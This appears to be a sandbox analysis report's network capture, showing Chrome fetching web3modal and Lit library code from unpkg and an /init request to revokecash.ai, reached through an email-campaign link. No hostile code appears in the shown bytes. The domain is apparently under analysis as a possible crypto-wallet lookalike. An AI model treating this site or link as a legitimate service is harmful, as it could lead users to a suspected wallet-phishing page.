                                                                          Data Ascii: .indexOf(n)<0&&(t[n]=a[n]);if(a!=null&&typeof Object.getOwnPropertySymbols=="function")for(var o=0,n=Object.getOwnPropertySymbols(a);o<n.length;o++)r.indexOf(n[o])<0&&Object.prototype.propertyIsEnumerable.call(a,n[o])&&(t[n[o]]=a[n[o]]);return t}function
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 74 3b 29 74 72 79 7b 69 66 28 6e 3d 31 2c 6f 26 26 28 63 3d 79 5b 30 5d 26 32 3f 6f 2e 72 65 74 75 72 6e 3a 79 5b 30 5d 3f 6f 2e 74 68 72 6f 77 7c 7c 28 28 63 3d 6f 2e 72 65 74 75 72 6e 29 26 26 63 2e 63 61 6c 6c 28 6f 29 2c 30 29 3a 6f 2e 6e 65 78 74 29 26 26 21 28 63 3d 63 2e 63 61 6c 6c 28 6f 2c 79 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 63 3b 73 77 69 74 63 68 28 6f 3d 30 2c 63 26 26 28 79 3d 5b 79 5b 30 5d 26 32 2c 63 2e 76 61 6c 75 65 5d 29 2c 79 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 63 3d 79 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 74 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 79 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20
                                                                          Data Ascii: executing.");for(;t;)try{if(n=1,o&&(c=y[0]&2?o.return:y[0]?o.throw||((c=o.return)&&c.call(o),0):o.next)&&!(c=c.call(o,y[1])).done)return c;switch(o=0,c&&(y=[y[0]&2,c.value]),y[0]){case 0:case 1:c=y;break;case 4:return t.label++,{value:y[1],done:!1};case
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 79 7b 6f 26 26 21 6f 2e 64 6f 6e 65 26 26 28 74 3d 6e 2e 72 65 74 75 72 6e 29 26 26 74 2e 63 61 6c 6c 28 6e 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 6c 29 74 68 72 6f 77 20 6c 2e 65 72 72 6f 72 7d 7d 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 64 31 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 72 3d 30 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 61 3d 61 2e 63 6f 6e 63 61 74 28 74 66 28 61 72 67 75 6d 65 6e 74 73 5b 72 5d 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 67 31 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 2c 72 3d 30 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 3c 74 3b 72 2b 2b 29 61 2b 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 76 61 72 20
                                                                          Data Ascii: y{o&&!o.done&&(t=n.return)&&t.call(n)}finally{if(l)throw l.error}}return c}function d1(){for(var a=[],r=0;r<arguments.length;r++)a=a.concat(tf(arguments[r]));return a}function g1(){for(var a=0,r=0,t=arguments.length;r<t;r++)a+=arguments[r].length;for(var
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 2c 74 3b 72 65 74 75 72 6e 20 72 3f 72 2e 63 61 6c 6c 28 61 29 3a 28 61 3d 74 79 70 65 6f 66 20 6c 63 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6c 63 28 61 29 3a 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 74 3d 7b 7d 2c 6e 28 22 6e 65 78 74 22 29 2c 6e 28 22 74 68 72 6f 77 22 29 2c 6e 28 22 72 65 74 75 72 6e 22 29 2c 74 5b 53 79 6d 62 6f 6c 2e 61 73 79 6e 63 49 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 74 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 63 29 7b 74 5b 63 5d 3d 61 5b 63 5d 26 26 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 64 2c 62 29 7b 6c 3d 61 5b 63 5d 28 6c 29 2c 6f 28 64 2c 62 2c 6c 2e 64 6f 6e 65
                                                                          Data Ascii: ,t;return r?r.call(a):(a=typeof lc=="function"?lc(a):a[Symbol.iterator](),t={},n("next"),n("throw"),n("return"),t[Symbol.asyncIterator]=function(){return this},t);function n(c){t[c]=a[c]&&function(l){return new Promise(function(d,b){l=a[c](l),o(d,b,l.done
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 53 31 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 43 61 6e 6e 6f 74 20 73 61 66 65 20 6a 73 6f 6e 20 70 61 72 73 65 20 76 61 6c 75 65 20 6f 66 20 74 79 70 65 20 24 7b 74 79 70 65 6f 66 20 61 7d 60 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 29 7d 63 61 74 63 68 7b 72 65 74 75 72 6e 20 61 7d 7d 59 6e 2e 73 61 66 65 4a 73 6f 6e 50 61 72 73 65 3d 53 31 3b 66 75 6e 63 74 69 6f 6e 20 50 31 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 3d 3d 22 73 74 72 69 6e 67 22 3f 61 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 2c 28 72 2c 74 29 3d 3e 74 79 70 65 6f 66 20 74 3e 22 75 22 3f 6e 75 6c 6c 3a 74 29 7d 59 6e 2e
                                                                          Data Ascii: nction S1(a){if(typeof a!="string")throw new Error(`Cannot safe json parse value of type ${typeof a}`);try{return JSON.parse(a)}catch{return a}}Yn.safeJsonParse=S1;function P1(a){return typeof a=="string"?a:JSON.stringify(a,(r,t)=>typeof t>"u"?null:t)}Yn.
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 3d 72 2c 4e 6e 7d 76 61 72 20 4b 68 3b 66 75 6e 63 74 69 6f 6e 20 52 31 28 29 7b 72 65 74 75 72 6e 20 4b 68 7c 7c 28 4b 68 3d 31 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 63 6f 6e 73 74 20 72 3d 72 66 3b 72 2e 5f 5f 65 78 70 6f 72 74 53 74 61 72 28 41 31 28 29 2c 61 29 2c 72 2e 5f 5f 65 78 70 6f 72 74 53 74 61 72 28 43 31 28 29 2c 61 29 7d 28 47 61 29 29 2c 47 61 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 70 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 70 6f 2e 4b 65 79 56 61 6c 75 65 53 74 6f 72 61 67 65 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 75 6e
                                                                          Data Ascii: =r,Nn}var Kh;function R1(){return Kh||(Kh=1,function(a){Object.defineProperty(a,"__esModule",{value:!0});const r=rf;r.__exportStar(A1(),a),r.__exportStar(C1(),a)}(Ga)),Ga}Object.defineProperty(po,"__esModule",{value:!0});po.KeyValueStorage=void 0;const un
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 52 43 48 41 4e 54 41 42 49 4c 49 54 59 0a 41 4e 44 20 46 49 54 4e 45 53 53 2e 20 49 4e 20 4e 4f 20 45 56 45 4e 54 20 53 48 41 4c 4c 20 54 48 45 20 41 55 54 48 4f 52 20 42 45 20 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 53 50 45 43 49 41 4c 2c 20 44 49 52 45 43 54 2c 0a 49 4e 44 49 52 45 43 54 2c 20 4f 52 20 43 4f 4e 53 45 51 55 45 4e 54 49 41 4c 20 44 41 4d 41 47 45 53 20 4f 52 20 41 4e 59 20 44 41 4d 41 47 45 53 20 57 48 41 54 53 4f 45 56 45 52 20 52 45 53 55 4c 54 49 4e 47 20 46 52 4f 4d 0a 4c 4f 53 53 20 4f 46 20 55 53 45 2c 20 44 41 54 41 20 4f 52 20 50 52 4f 46 49 54 53 2c 20 57 48 45 54 48 45 52 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 4e 45 47 4c 49 47 45 4e 43 45 20 4f 52 0a 4f 54 48 45 52 20 54 4f 52 54
                                                                          Data Ascii: RCHANTABILITYAND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROMLOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OROTHER TORT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.549736104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:21 UTC627OUTGET /@web3modal/html@2.7.1/dist/cdn/index-fec845d6.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/bundle-7a116c93.js
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:21 UTC577INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:21 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:21 UTC792INData Raw: 37 64 36 30 0d 0a 69 6d 70 6f 72 74 7b 70 20 61 73 20 61 74 2c 79 20 61 73 20 4d 2c 72 20 61 73 20 4a 2c 75 20 61 73 20 5a 2c 48 20 61 73 20 41 74 2c 66 20 61 73 20 44 2c 4b 20 61 73 20 6a 2c 67 20 61 73 20 46 2c 6f 20 61 73 20 4f 2c 55 20 61 73 20 48 2c 6e 20 61 73 20 57 2c 76 20 61 73 20 47 7d 66 72 6f 6d 22 2e 2f 62 75 6e 64 6c 65 2d 37 61 31 31 36 63 39 33 2e 6a 73 22 3b 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 39 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 2a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 42 53 44 2d 33 2d 43 6c 61 75 73 65 0a 20 2a 2f 63 6f 6e 73 74 20 55 65 3d 77 69 6e 64 6f 77 2c 74 69 3d 55 65 2e 53 68 61 64 6f 77 52 6f 6f 74 26 26 28 55 65 2e 53 68
                                                                          Data Ascii: 7d60import{p as at,y as M,r as J,u as Z,H as At,f as D,K as j,g as F,o as O,U as H,n as W,v as G}from"./bundle-7a116c93.js";/** * @license * Copyright 2019 Google LLC * SPDX-License-Identifier: BSD-3-Clause */const Ue=window,ti=Ue.ShadowRoot&&(Ue.Sh
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 65 74 75 72 6e 20 74 68 69 73 2e 63 73 73 54 65 78 74 7d 7d 3b 63 6f 6e 73 74 20 6a 6f 3d 65 3d 3e 6e 65 77 20 74 6f 28 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 3f 65 3a 65 2b 22 22 2c 76 6f 69 64 20 30 2c 65 69 29 2c 49 3d 28 65 2c 2e 2e 2e 74 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 65 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3f 65 5b 30 5d 3a 74 2e 72 65 64 75 63 65 28 28 6f 2c 69 2c 72 29 3d 3e 6f 2b 28 61 3d 3e 7b 69 66 28 61 2e 5f 24 63 73 73 52 65 73 75 6c 74 24 3d 3d 3d 21 30 29 72 65 74 75 72 6e 20 61 2e 63 73 73 54 65 78 74 3b 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 20 61 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 56 61 6c 75 65 20 70 61 73 73 65 64 20 74 6f 20 27 63 73 73 27 20 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: eturn this.cssText}};const jo=e=>new to(typeof e=="string"?e:e+"",void 0,ei),I=(e,...t)=>{const n=e.length===1?e[0]:t.reduce((o,i,r)=>o+(a=>{if(a._$cssResult$===!0)return a.cssText;if(typeof a=="number")return a;throw Error("Value passed to 'css' function
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 3d 22 66 69 6e 61 6c 69 7a 65 64 22 3b 6c 65 74 20 44 74 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 5f 24 45 69 3d 6e 65 77 20 4d 61 70 2c 74 68 69 73 2e 69 73 55 70 64 61 74 65 50 65 6e 64 69 6e 67 3d 21 31 2c 74 68 69 73 2e 68 61 73 55 70 64 61 74 65 64 3d 21 31 2c 74 68 69 73 2e 5f 24 45 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 75 28 29 7d 73 74 61 74 69 63 20 61 64 64 49 6e 69 74 69 61 6c 69 7a 65 72 28 74 29 7b 76 61 72 20 6e 3b 74 68 69 73 2e 66 69 6e 61 6c 69 7a 65 28 29 2c 28 28 6e 3d 74 68 69 73 2e 68 29 21 3d 3d 6e 75 6c 6c 26 26 6e 21 3d 3d 76 6f 69 64 20 30 3f 6e 3a 74 68 69 73 2e 68 3d 5b 5d 29 2e 70 75 73 68 28 74 29 7d 73 74 61
                                                                          Data Ascii: ="finalized";let Dt=class extends HTMLElement{constructor(){super(),this._$Ei=new Map,this.isUpdatePending=!1,this.hasUpdated=!1,this._$El=null,this.u()}static addInitializer(t){var n;this.finalize(),((n=this.h)!==null&&n!==void 0?n:this.h=[]).push(t)}sta
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 73 2e 66 69 6e 61 6c 69 7a 65 53 74 79 6c 65 73 28 74 68 69 73 2e 73 74 79 6c 65 73 29 2c 21 30 7d 73 74 61 74 69 63 20 66 69 6e 61 6c 69 7a 65 53 74 79 6c 65 73 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 5b 5d 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 7b 63 6f 6e 73 74 20 6f 3d 6e 65 77 20 53 65 74 28 74 2e 66 6c 61 74 28 31 2f 30 29 2e 72 65 76 65 72 73 65 28 29 29 3b 66 6f 72 28 63 6f 6e 73 74 20 69 20 6f 66 20 6f 29 6e 2e 75 6e 73 68 69 66 74 28 68 69 28 69 29 29 7d 65 6c 73 65 20 74 21 3d 3d 76 6f 69 64 20 30 26 26 6e 2e 70 75 73 68 28 68 69 28 74 29 29 3b 72 65 74 75 72 6e 20 6e 7d 73 74 61 74 69 63 20 5f 24 45 70 28 74 2c 6e 29 7b 63 6f 6e 73 74 20 6f 3d 6e 2e 61 74 74 72 69 62 75 74 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 21 31 3f 76
                                                                          Data Ascii: s.finalizeStyles(this.styles),!0}static finalizeStyles(t){const n=[];if(Array.isArray(t)){const o=new Set(t.flat(1/0).reverse());for(const i of o)n.unshift(hi(i))}else t!==void 0&&n.push(hi(t));return n}static _$Ep(t,n){const o=n.attribute;return o===!1?v
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 53 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 66 6f 72 45 61 63 68 28 6e 3d 3e 7b 76 61 72 20 6f 3b 72 65 74 75 72 6e 28 6f 3d 6e 2e 68 6f 73 74 44 69 73 63 6f 6e 6e 65 63 74 65 64 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6f 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 6f 2e 63 61 6c 6c 28 6e 29 7d 29 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 74 2c 6e 2c 6f 29 7b 74 68 69 73 2e 5f 24 41 4b 28 74 2c 6f 29 7d 5f 24 45 4f 28 74 2c 6e 2c 6f 3d 65 6e 29 7b 76 61 72 20 69 3b 63 6f 6e 73 74 20 72 3d 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 5f 24 45 70 28 74 2c 6f 29 3b 69 66 28 72 21 3d 3d 76 6f 69 64 20 30 26 26 6f 2e 72 65 66 6c 65 63 74 3d 3d 3d 21 30 29 7b 63 6f 6e 73 74 20 61 3d 28 28 28
                                                                          Data Ascii: S)===null||t===void 0||t.forEach(n=>{var o;return(o=n.hostDisconnected)===null||o===void 0?void 0:o.call(n)})}attributeChangedCallback(t,n,o){this._$AK(t,o)}_$EO(t,n,o=en){var i;const r=this.constructor._$Ep(t,o);if(r!==void 0&&o.reflect===!0){const a=(((
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 6f 72 45 61 63 68 28 28 69 2c 72 29 3d 3e 74 68 69 73 5b 72 5d 3d 69 29 2c 74 68 69 73 2e 5f 24 45 69 3d 76 6f 69 64 20 30 29 3b 6c 65 74 20 6e 3d 21 31 3b 63 6f 6e 73 74 20 6f 3d 74 68 69 73 2e 5f 24 41 4c 3b 74 72 79 7b 6e 3d 74 68 69 73 2e 73 68 6f 75 6c 64 55 70 64 61 74 65 28 6f 29 2c 6e 3f 28 74 68 69 73 2e 77 69 6c 6c 55 70 64 61 74 65 28 6f 29 2c 28 74 3d 74 68 69 73 2e 5f 24 45 53 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 66 6f 72 45 61 63 68 28 69 3d 3e 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 28 72 3d 69 2e 68 6f 73 74 55 70 64 61 74 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 63 61 6c 6c 28 69 29 7d 29 2c 74 68 69 73 2e 75 70 64 61 74 65 28 6f 29 29 3a 74 68 69 73 2e
                                                                          Data Ascii: orEach((i,r)=>this[r]=i),this._$Ei=void 0);let n=!1;const o=this._$AL;try{n=this.shouldUpdate(o),n?(this.willUpdate(o),(t=this._$ES)===null||t===void 0||t.forEach(i=>{var r;return(r=i.hostUpdate)===null||r===void 0?void 0:r.call(i)}),this.update(o)):this.
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 3e 65 3d 3d 3d 6e 75 6c 6c 7c 7c 74 79 70 65 6f 66 20 65 21 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 65 21 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 69 6f 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 2c 55 6f 3d 65 3d 3e 69 6f 28 65 29 7c 7c 74 79 70 65 6f 66 20 65 3f 2e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 6f 6e 3d 60 5b 20 09 0a 5c 66 5c 72 5d 60 2c 71 74 3d 2f 3c 28 3f 3a 28 21 2d 2d 7c 5c 2f 5b 5e 61 2d 7a 41 2d 5a 5d 29 7c 28 5c 2f 3f 5b 61 2d 7a 41 2d 5a 5d 5b 5e 3e 5c 73 5d 2a 29 7c 28 5c 2f 3f 24 29 29 2f 67 2c 67 69 3d 2f 2d 2d 3e 2f 67 2c 77 69 3d 2f 3e 2f 67 2c 67 74 3d 52 65 67 45 78 70 28 60 3e 7c 24 7b 6f 6e 7d 28 3f 3a 28 5b 5e 5c 5c 73 22 27 3e 3d 2f 5d 2b 29 28 24 7b 6f 6e 7d 2a 3d
                                                                          Data Ascii: >e===null||typeof e!="object"&&typeof e!="function",io=Array.isArray,Uo=e=>io(e)||typeof e?.[Symbol.iterator]=="function",on=`[ \f\r]`,qt=/<(?:(!--|\/[^a-zA-Z])|(\/?[a-zA-Z][^>\s]*)|(\/?$))/g,gi=/-->/g,wi=/>/g,gt=RegExp(`>|${on}(?:([^\\s"'>=/]+)(${on}*=
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 3e 22 3a 22 22 29 29 2c 6f 5d 7d 3b 63 6c 61 73 73 20 77 65 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 7b 73 74 72 69 6e 67 73 3a 74 2c 5f 24 6c 69 74 54 79 70 65 24 3a 6e 7d 2c 6f 29 7b 6c 65 74 20 69 3b 74 68 69 73 2e 70 61 72 74 73 3d 5b 5d 3b 6c 65 74 20 72 3d 30 2c 61 3d 30 3b 63 6f 6e 73 74 20 6c 3d 74 2e 6c 65 6e 67 74 68 2d 31 2c 73 3d 74 68 69 73 2e 70 61 72 74 73 2c 5b 63 2c 68 5d 3d 48 6f 28 74 2c 6e 29 3b 69 66 28 74 68 69 73 2e 65 6c 3d 77 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2c 6f 29 2c 6b 74 2e 63 75 72 72 65 6e 74 4e 6f 64 65 3d 74 68 69 73 2e 65 6c 2e 63 6f 6e 74 65 6e 74 2c 6e 3d 3d 3d 32 29 7b 63 6f 6e 73 74 20 77 3d 74 68 69 73 2e 65 6c 2e 63 6f 6e 74 65 6e 74 2c 75 3d 77 2e 66 69 72 73 74 43 68 69 6c 64 3b 75 2e 72 65 6d 6f
                                                                          Data Ascii: >":"")),o]};class we{constructor({strings:t,_$litType$:n},o){let i;this.parts=[];let r=0,a=0;const l=t.length-1,s=this.parts,[c,h]=Ho(t,n);if(this.el=we.createElement(c,o),kt.currentNode=this.el.content,n===2){const w=this.el.content,u=w.firstChild;u.remo
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 6e 73 74 72 75 63 74 6f 72 21 3d 3d 63 26 26 28 28 72 3d 73 3f 2e 5f 24 41 4f 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 7c 7c 72 2e 63 61 6c 6c 28 73 2c 21 31 29 2c 63 3d 3d 3d 76 6f 69 64 20 30 3f 73 3d 76 6f 69 64 20 30 3a 28 73 3d 6e 65 77 20 63 28 65 29 2c 73 2e 5f 24 41 54 28 65 2c 6e 2c 6f 29 29 2c 6f 21 3d 3d 76 6f 69 64 20 30 3f 28 28 61 3d 28 6c 3d 6e 29 2e 5f 24 43 6f 29 21 3d 3d 6e 75 6c 6c 26 26 61 21 3d 3d 76 6f 69 64 20 30 3f 61 3a 6c 2e 5f 24 43 6f 3d 5b 5d 29 5b 6f 5d 3d 73 3a 6e 2e 5f 24 43 6c 3d 73 29 2c 73 21 3d 3d 76 6f 69 64 20 30 26 26 28 74 3d 5a 74 28 65 2c 73 2e 5f 24 41 53 28 65 2c 74 2e 76 61 6c 75 65 73 29 2c 73 2c 6f 29 29 2c 74 7d 6c 65 74 20 5a 6f 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74
                                                                          Data Ascii: nstructor!==c&&((r=s?._$AO)===null||r===void 0||r.call(s,!1),c===void 0?s=void 0:(s=new c(e),s._$AT(e,n,o)),o!==void 0?((a=(l=n)._$Co)!==null&&a!==void 0?a:l._$Co=[])[o]=s:n._$Cl=s),s!==void 0&&(t=Zt(e,s._$AS(e,t.values),s,o)),t}let Zo=class{constructor(t


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.549737104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:21 UTC839OUTGET /init HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                          X-Requested-With: XMLHttpRequest
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:22 UTC633INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 45 54 61 67 3a 20 57 2f 22 63 2d 72 44 75 32 73 6b 61 65 4c 33 6d 75 54 73 64 53 4f 74 30 7a 56 37 66 49 2b 6b 63 22 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:22 GMTContent-Type: application/json; charset=utf-8Content-Length: 12Connection: closeX-Powered-By: ExpressETag: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[
                                                                          2023-12-10 16:44:22 UTC12INData Raw: 7b 22 69 64 22 3a 31 31 33 30 32 7d
                                                                          Data Ascii: {"id":11302}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
